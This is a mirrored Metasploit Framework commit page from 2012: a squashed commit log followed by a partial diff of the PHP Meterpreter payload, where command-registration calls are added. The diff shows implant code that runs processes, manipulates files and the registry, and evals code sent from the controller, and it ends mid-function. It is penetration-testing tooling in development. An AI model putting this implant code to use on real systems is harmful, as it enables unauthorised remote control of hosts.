infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Squashed commit of the following: 

commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:49 2012 -0600

    Add register_command calls for md5 and sha1

commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 16:22:09 2012 -0600

    Read the file instead of downloading it

commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 15:27:11 2012 -0600

    Re-compile linux meterp to support the loadlib api

commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:50:25 2012 -0600

    Re-compile java meterp to support the loadlib api

commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:44:10 2012 -0600

    Don't try to get interfaces if this session doesn't implement it

commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 14:38:17 2012 -0600

    Remove debugging load

commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 9 12:06:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.php
    	modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb

commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date:   Wed May 2 18:06:06 2012 -0600

    PHP doesn't support rev2self

commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 18:21:59 2012 -0600

    Add php support for returning new extension commands

commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 16:03:26 2012 -0600

    Reset CVE-2012-0507 back to master

    Purges commits unrelated to this branch.

commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:59:35 2012 -0600

    Revert "Make building the jar for cve-2012-0507 a bit easier"

    This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.

    Conflicts:

    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java

commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date:   Tue May 1 15:35:44 2012 -0600

    Merge branch 'rapid7' into feature/4905

    Conflicts:
    	data/meterpreter/ext_server_stdapi.jar
    	data/meterpreter/meterpreter.jar
    	external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
    	modules/auxiliary/server/browser_autopwn.rb

commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date:   Fri Apr 6 10:19:53 2012 -0600

    Merge branch 'rapid7' into feature/4905

commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:51:18 2012 -0600

    Fix requires to find the test library

commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 17:48:35 2012 -0600

    Fix a load order problem with solaris post mods

commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:43:19 2012 -0600

    Merge branch 'master' into feature/4905

commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date:   Thu Apr 5 15:16:56 2012 -0600

    Merge branch 'rapid7'

    Conflicts:
    	lib/rex/exploitation/javascriptosdetect.rb

commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.

commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 18:04:50 2012 -0600

    Linux doesn't implement (drop|steal)_token

commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 17:57:37 2012 -0600

    Add availability checks for net, sys, ui, and webcam

commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 23 16:45:59 2012 -0600

    add requirement checking for fs and core commands

commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:59 2012 -0600

    Add a to_octal method that converts e.g. "A" to \0101

commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 21 17:20:07 2012 -0600

    Don't use "echo -n"

    It's not portable

commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 17:01:10 2012 -0600

    Return a list of new commands after core_loadlib, java version

    Thanks mihi for the patch and the awesome responsiveness!

commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 20 13:21:06 2012 -0600

    Make sure we have a response before doing stuff with it

commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 21:25:31 2012 -0600

    Add missing rmdir and mkdir protocol commands to PHP

    Now passes all the stdapi tests that it can
    	[*] Session type is meterpreter and platform is php/php
    	[+] should return a user id
    	[+] should return a sysinfo Hash
    	[-] FAILED: should return network interfaces
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should have an interface that matches session_host
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
    	[-] FAILED: should return network routes
    	[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
    	[+] should return the proper directory separator
    	[+] should return the current working directory
    	[+] should list files in the current directory
    	[+] should stat a directory
    	[+] should create and remove a dir
    	[+] should change directories
    	[+] should create and remove files
    	[+] should upload a file
    	[-] Passed: 10; Failed: 3

commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:26:00 2012 -0600

    Use a proper TLV type instead of a generic one

commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:24:25 2012 -0600

    Fix a counting error that caused segfaults (Linux)

commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 15:06:02 2012 -0600

    Return a list of new commands after core_loadlib

    Gets Windows back in sync with Linux

commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date:   Mon Mar 19 14:50:55 2012 -0600

    Refactor extensionList -> extension_commands

    It's not the same as extension_list.

commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sun Mar 18 00:07:27 2012 -0500

    Massive whitespace cleanup

commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 16:00:20 2012 -0500

    Add back enum_protections with some new changes

commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date:   Sat Mar 17 13:28:31 2012 -0400

    Added fix for enum_protections

commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 03:14:26 2012 -0500

    A bunch of fixes

commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:28:05 2012 -0500

    The comments in get_chatlogs need an update

commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:25:41 2012 -0500

    Correct license format

commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Sat Mar 17 00:22:03 2012 -0500

    Add enum_adium.rb post module

commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 16:54:36 2012 -0300

    Changed store_note to store_loot. Fixed local/remote file retrieval

commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 11:29:07 2012 -0600

    Fall back to MIB method if we can't get netmasks

    Misses IPv6 addresses, but at least doesn't break everything.

    [Fixes #6525]

commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Fri Mar 16 11:49:31 2012 -0500

    This module is not ready, yanked.

commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date:   Fri Mar 16 18:09:08 2012 +0200

    sockso_traversal 1.8 compatibility fix

commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:17:35 2012 -0400

    fix

commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date:   Fri Mar 16 09:14:48 2012 -0400

    saves each config to loot instead of notes

commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 03:46:10 2012 -0600

    Check for a 0 prefix length

    If the OnLinkPrefixLength is 0, something is wrong, try the value in the
    prefix linked list.  Appears to fix v4 addresses on XP but not 2k3.

    [See #6525]

commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date:   Fri Mar 16 01:46:41 2012 -0600

    Return network prefixes when available

    Solves #6525 on Vista+.  Win2k still works using the old MIB method
    (which doesn't support ipv6).  Win2k3 and XP are still busted for
    unknown reasons.

commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 22:59:42 2012 -0400

    Enumerate important and interesting configuration files

commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 19:06:48 2012 -0500

    More Virtualisation SSL fixes

commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date:   Thu Mar 15 18:15:29 2012 -0500

    Default SSL to true for esx_fingerprint module

commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:56:24 2012 -0500

    Fix typo

commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 15:55:54 2012 -0500

    Add sockso dir traversal

commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 15 14:31:25 2012 -0600

    Fix syntax error in 1.8, thanks Jun Koi for the patch

commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:27:40 2012 -0500

    enum_protections is now find_apps

commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Thu Mar 15 14:22:23 2012 -0500

    File rename, as well as design and cosmetic changes

commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 15:29:52 2012 -0300

    added report_note, removed store_loot function, cleaned up info/author

commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 12:18:29 2012 -0300

    fixed output newline issue

commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:05:35 2012 -0300

    fixed save line

commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:02:07 2012 -0300

    removed unneeded comments

commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date:   Thu Mar 15 01:00:55 2012 -0300

    fixed output issue

commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 18:26:53 2012 -0300

    removed unneeded dependency

commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date:   Wed Mar 14 13:30:16 2012 -0400

    locates installed 3rd part av, fws, etc

commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date:   Wed Mar 14 16:50:54 2012 -0500

    Add OSVDB-79863 NetDecision Directory Traversal

commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 23:03:01 2012 -0600

    Store the retrieved commands on the session

commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:45:16 2012 -0600

    Retrieve the list of new commands

    The client side doesn't do anything with them yet

commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 22:41:16 2012 -0600

    Return a list of the new commands in response to core_loadlib

    Linux

commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 15:13:45 2012 -0600

    Whitespace at EOL

commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 14 14:30:09 2012 -0600

    Create instance methods that return extensions

    Before this change, meterpreter sessions would not #respond_to? their
    extensions despite having a pseudo-accessor for them:
    ```
    >> client.respond_to? :sys
    => false
    >> client.sys
    => #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>

    ```

    After:
    ```
    >> client.respond_to? :sys
    => true
    ```

commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date:   Tue Apr 3 11:46:25 2012 -0600

    Merge branch 'master' into bap-refactor

    Conflicts:
    	external/source/exploits/CVE-2012-0507/Help.java
    	external/source/exploits/CVE-2012-0507/Makefile
    	external/source/exploits/CVE-2012-0507/msf/x/Help.java
    	external/source/exploits/CVE-2012-0507/src/a/Exploit.java
    	external/source/exploits/CVE-2012-0507/src/a/Help.java

commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 20:20:21 2012 -0600

    Deal with null data/jar

    Not sure why "" turns into null sometimes, but it was breaking shells;
    this fixes it.

commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:10:59 2012 -0600

    Prev commit moved these to src/a

commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 18:08:32 2012 -0600

    Make building the jar for cve-2012-0507 a bit easier

    Mostly stolen from cve-2008-5353

commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 14:52:23 2012 -0600

    Fix incorrect option name

commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:24:33 2012 -0600

    Add the detected browser version to the DOM

    Doing it this way lets modules grab the info a bit more easily.

commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date:   Thu Mar 29 13:19:05 2012 -0600

    Merge branch 'master' into bap-refactor

commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:36:20 2012 -0600

    Add bap support to java_rhino

commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:35:16 2012 -0600

    Put next_exploit on the window object so it's always in scope

    Solves some issues with Chrome not running more than one exploit

commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date:   Wed Mar 28 15:10:54 2012 -0600

    Merge branch 'master' into bap-refactor

commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 14:31:53 2012 -0600

    Pull common stuff up out of the body

commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:04:03 2012 -0600

    Fix indentation level

commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date:   Tue Mar 27 11:02:42 2012 -0600

    Abstract out copy-pasted methods

    Need to do the same thing for OSX, but it's a different implementation.
unstable
James Lee 2012-05-15 17:00:02 -06:00
parent 55bb7abc89
commit 42719ab34b
34 changed files with 576 additions and 361 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/meterpreter/ext_server_networkpug.lso
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.lso
View File

Binary file not shown.

0
data/meterpreter/ext_server_stdapi.jar Executable file → Normal file
View File

BIN
data/meterpreter/ext_server_stdapi.lso
View File

Binary file not shown.

65
data/meterpreter/ext_server_stdapi.php
View File

@ -283,6 +283,7 @@ function cononicalize_path($path) {
# traditionally used this to get environment variables from the server.
#
if (!function_exists('stdapi_fs_file_expand_path')) {
register_command('stdapi_fs_file_expand_path');
function stdapi_fs_file_expand_path($req, &$pkt) {
my_print("doing expand_path");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -320,18 +321,8 @@ function stdapi_fs_file_expand_path($req, &$pkt) {
}
}
if (!function_exists('stdapi_fs_mkdir')) {
function stdapi_fs_mkdir($req, &$pkt) {
my_print("doing mkdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
$ret = mkdir(cononicalize_path($path_tlv['value']),0777);
return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
}
}
if (!function_exists('stdapi_fs_delete_dir')) {
register_command('stdapi_fs_delete_dir');
function stdapi_fs_delete_dir($req, &$pkt) {
my_print("doing rmdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -340,9 +331,19 @@ function stdapi_fs_delete_dir($req, &$pkt) {
}
}
if (!function_exists('stdapi_fs_mkdir')) {
register_command('stdapi_fs_mkdir');
function stdapi_fs_mkdir($req, &$pkt) {
my_print("doing mkdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
$ret = @mkdir(cononicalize_path($path_tlv['value']));
return $ret ? ERROR_SUCCESS : ERROR_FAILURE;
}
}
# works
if (!function_exists('stdapi_fs_chdir')) {
register_command('stdapi_fs_chdir');
function stdapi_fs_chdir($req, &$pkt) {
my_print("doing chdir");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -353,6 +354,7 @@ function stdapi_fs_chdir($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_delete')) {
register_command('stdapi_fs_delete');
function stdapi_fs_delete($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_NAME);
@ -363,6 +365,7 @@ function stdapi_fs_delete($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_getwd')) {
register_command('stdapi_fs_getwd');
function stdapi_fs_getwd($req, &$pkt) {
my_print("doing pwd");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_DIRECTORY_PATH, getcwd()));
@ -373,6 +376,7 @@ function stdapi_fs_getwd($req, &$pkt) {
# works partially, need to get the path argument to mean the same thing as in
# windows
if (!function_exists('stdapi_fs_ls')) {
register_command('stdapi_fs_ls');
function stdapi_fs_ls($req, &$pkt) {
my_print("doing ls");
$path_tlv = packet_get_tlv($req, TLV_TYPE_DIRECTORY_PATH);
@ -413,6 +417,7 @@ function stdapi_fs_ls($req, &$pkt) {
}
if (!function_exists('stdapi_fs_separator')) {
register_command('stdapi_fs_separator');
function stdapi_fs_separator($req, &$pkt) {
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, DIRECTORY_SEPARATOR));
return ERROR_SUCCESS;
@ -420,6 +425,7 @@ function stdapi_fs_separator($req, &$pkt) {
}
if (!function_exists('stdapi_fs_stat')) {
register_command('stdapi_fs_stat');
function stdapi_fs_stat($req, &$pkt) {
my_print("doing stat");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -452,6 +458,7 @@ function stdapi_fs_stat($req, &$pkt) {
# works
if (!function_exists('stdapi_fs_delete_file')) {
register_command('stdapi_fs_delete_file');
function stdapi_fs_delete_file($req, &$pkt) {
my_print("doing delete");
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
@ -467,6 +474,7 @@ function stdapi_fs_delete_file($req, &$pkt) {
}
if (!function_exists('stdapi_fs_search')) {
register_command('stdapi_fs_search');
function stdapi_fs_search($req, &$pkt) {
my_print("doing search");
@ -506,6 +514,7 @@ function stdapi_fs_search($req, &$pkt) {
if (!function_exists('stdapi_fs_md5')) {
register_command("stdapi_fs_md5");
function stdapi_fs_md5($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
@ -524,6 +533,7 @@ function stdapi_fs_md5($req, &$pkt) {
if (!function_exists('stdapi_fs_sha1')) {
register_command("stdapi_fs_sha1");
function stdapi_fs_sha1($req, &$pkt) {
$path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH);
$path = cononicalize_path($path_tlv['value']);
@ -545,6 +555,7 @@ function stdapi_fs_sha1($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_config_getuid')) {
register_command('stdapi_sys_config_getuid');
function stdapi_sys_config_getuid($req, &$pkt) {
my_print("doing getuid");
if (is_callable('posix_getuid')) {
@ -563,15 +574,17 @@ function stdapi_sys_config_getuid($req, &$pkt) {
}
# Unimplemented becuase it's unimplementable
if (!function_exists('stdapi_sys_config_rev2self')) {
function stdapi_sys_config_rev2self($req, &$pkt) {
my_print("doing rev2self");
return ERROR_FAILURE;
}
}
#if (!function_exists('stdapi_sys_config_rev2self')) {
#register_command('stdapi_sys_config_rev2self');
#function stdapi_sys_config_rev2self($req, &$pkt) {
# my_print("doing rev2self");
# return ERROR_FAILURE;
#}
#}
# works
if (!function_exists('stdapi_sys_config_sysinfo')) {
register_command('stdapi_sys_config_sysinfo');
function stdapi_sys_config_sysinfo($req, &$pkt) {
my_print("doing sysinfo");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_COMPUTER_NAME, php_uname("n")));
@ -584,6 +597,7 @@ function stdapi_sys_config_sysinfo($req, &$pkt) {
$GLOBALS['processes'] = array();
if (!function_exists('stdapi_sys_process_execute')) {
register_command('stdapi_sys_process_execute');
function stdapi_sys_process_execute($req, &$pkt) {
global $channel_process_map, $processes;
@ -658,6 +672,7 @@ function stdapi_sys_process_execute($req, &$pkt) {
if (!function_exists('stdapi_sys_process_close')) {
register_command('stdapi_sys_process_close');
function stdapi_sys_process_close($req, &$pkt) {
global $processes;
my_print("doing process_close");
@ -711,6 +726,7 @@ function close_process($proc) {
# to decide what options to send to ps for portability and for information
# usefulness.
if (!function_exists('stdapi_sys_process_get_processes')) {
register_command('stdapi_sys_process_get_processes');
function stdapi_sys_process_get_processes($req, &$pkt) {
my_print("doing get_processes");
$list = array();
@ -760,6 +776,7 @@ function stdapi_sys_process_get_processes($req, &$pkt) {
# works
if (!function_exists('stdapi_sys_process_getpid')) {
register_command('stdapi_sys_process_getpid');
function stdapi_sys_process_getpid($req, &$pkt) {
my_print("doing getpid");
packet_add_tlv($pkt, create_tlv(TLV_TYPE_PID, getmypid()));
@ -768,6 +785,7 @@ function stdapi_sys_process_getpid($req, &$pkt) {
}
if (!function_exists('stdapi_sys_process_kill')) {
register_command('stdapi_sys_process_kill');
function stdapi_sys_process_kill($req, &$pkt) {
# The existence of posix_kill is unlikely (it's a php compile-time option
# that isn't enabled by default, but better to try it and avoid shelling
@ -798,6 +816,7 @@ function stdapi_sys_process_kill($req, &$pkt) {
}
if (!function_exists('stdapi_net_socket_tcp_shutdown')) {
register_command('stdapi_net_socket_tcp_shutdown');
function stdapi_net_socket_tcp_shutdown($req, &$pkt) {
my_print("doing stdapi_net_socket_tcp_shutdown");
$cid_tlv = packet_get_tlv($req, TLV_TYPE_CHANNEL_ID);
@ -838,6 +857,9 @@ function deregister_registry_key($id) {
if (!function_exists('stdapi_registry_create_key')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_create_key');
}
function stdapi_registry_create_key($req, &$pkt) {
my_print("doing stdapi_registry_create_key");
if (is_windows() and is_callable('reg_open_key')) {
@ -871,6 +893,9 @@ function stdapi_registry_create_key($req, &$pkt) {
}
if (!function_exists('stdapi_registry_close_key')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_close_key');
}
function stdapi_registry_close_key($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
@ -889,6 +914,9 @@ function stdapi_registry_close_key($req, &$pkt) {
}
if (!function_exists('stdapi_registry_query_value')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_query_value');
}
function stdapi_registry_query_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;
@ -926,6 +954,9 @@ function stdapi_registry_query_value($req, &$pkt) {
}
if (!function_exists('stdapi_registry_set_value')) {
if (is_windows() and is_callable('reg_open_key')) {
register_command('stdapi_registry_set_value');
}
function stdapi_registry_set_value($req, &$pkt) {
if (is_windows() and is_callable('reg_open_key')) {
global $registry_handles;

BIN
data/meterpreter/meterpreter.jar Executable file → Normal file
View File

Binary file not shown.

24
data/meterpreter/meterpreter.php
View File

@ -30,6 +30,18 @@ if (!isset($GLOBALS['readers'])) {
$GLOBALS['readers'] = array();
}
# global list of extension commands
if (!isset($GLOBALS['commands'])) {
$GLOBALS['commands'] = array("core_loadlib");
}
function register_command($c) {
global $commands;
if (! in_array($c, $commands)) {
array_push($commands, $c);
}
}
function my_print($str) {
#error_log($str);
}
@ -389,14 +401,20 @@ function core_shutdown($req, &$pkt) {
# isn't compressed before eval'ing it
# TODO: check for zlib support and decompress if possible
function core_loadlib($req, &$pkt) {
global $commands;
my_print("doing core_loadlib");
$data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
return ERROR_FAILURE;
} else {
eval($data_tlv['value']);
return ERROR_SUCCESS;
}
$tmp = $commands;
eval($data_tlv['value']);
